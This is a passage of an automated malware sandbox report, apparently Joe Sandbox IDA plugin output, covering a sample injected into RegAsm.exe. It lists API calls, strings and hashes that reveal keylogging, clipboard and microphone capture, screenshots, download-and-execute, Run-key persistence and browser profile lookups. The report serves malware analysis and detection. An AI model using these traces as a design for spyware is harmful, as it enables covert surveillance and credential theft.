                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                          • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                          • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                          • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                          APIs
                                                          • _free.LIBCMT ref: 1000655C
                                                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                          • String ID: *?$.
                                                          • API String ID: 2667617558-3972193922
                                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418ABE
                                                            • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                            • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                            • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/jpeg
                                                          • API String ID: 1291196975-3785015651
                                                          • Opcode ID: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                          • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                                          • Opcode Fuzzy Hash: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                          • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                          APIs
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          • __Init_thread_footer.LIBCMT ref: 0040B797
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                          • API String ID: 1881088180-3686566968
                                                          • Opcode ID: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                                                          • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                          • Opcode Fuzzy Hash: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                                                          • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                          • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                          • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                          • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 481472006-1507639952
                                                          • Opcode ID: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                                                          • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                          • Opcode Fuzzy Hash: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                                                          • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                          APIs
                                                          • Sleep.KERNEL32 ref: 00416640
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadFileSleep
                                                          • String ID: !D@
                                                          • API String ID: 1931167962-604454484
                                                          • Opcode ID: 5095b75c5f9db238aea0001e6592924ae8405ba6706ac8883079950a7719889b
                                                          • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                          • Opcode Fuzzy Hash: 5095b75c5f9db238aea0001e6592924ae8405ba6706ac8883079950a7719889b
                                                          • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: : $Se.
                                                          • API String ID: 4218353326-4089948878
                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                          • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                          • Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                          • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: alarm.wav$hYG
                                                          • API String ID: 1174141254-2782910960
                                                          • Opcode ID: 18e052de717180e5ab5073ed062dd2c189db3243629e7a025cf8991a71f881ef
                                                          • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                          • Opcode Fuzzy Hash: 18e052de717180e5ab5073ed062dd2c189db3243629e7a025cf8991a71f881ef
                                                          • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                          APIs
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                          • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                                                          • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                          • Opcode Fuzzy Hash: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                                                          • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID: Unknown exception
                                                          • API String ID: 3476068407-410509341
                                                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                          APIs
                                                          • waveInPrepareHeader.WINMM(00598F78,00000020,?), ref: 00401849
                                                          • waveInAddBuffer.WINMM(00598F78,00000020), ref: 0040185F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferHeaderPrepare
                                                          • String ID: [
                                                          • API String ID: 2315374483-2256786511
                                                          • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                          • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                          APIs
                                                          • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocaleValid
                                                          • String ID: IsValidLocaleName$JD
                                                          • API String ID: 1901932003-2234456777
                                                          • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                          • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                          • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                          • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                          • API String ID: 1174141254-4188645398
                                                          • Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                          • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                          • Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                          • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                          • API String ID: 1174141254-2800177040
                                                          • Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                          • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                          • Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                          • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                          • API String ID: 1174141254-1629609700
                                                          • Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                          • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                          • Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                          • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 0040B64B
                                                            • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                            • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                            • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                                            • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                            • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                            • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                                            • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                                          • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                          • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                                          • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                          APIs
                                                          • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                          • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: uD
                                                          • API String ID: 0-2547262877
                                                          • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                          • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                          • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                          • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: !D@$open
                                                          • API String ID: 587946157-1586967515
                                                          • Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                          • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                          • Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                          • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                          • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                          • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                          • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                          APIs
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          • __Init_thread_footer.LIBCMT ref: 00410F29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: ,kG$0kG
                                                          • API String ID: 1881088180-2015055088
                                                          • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                          • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                          • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                          • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                          APIs
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
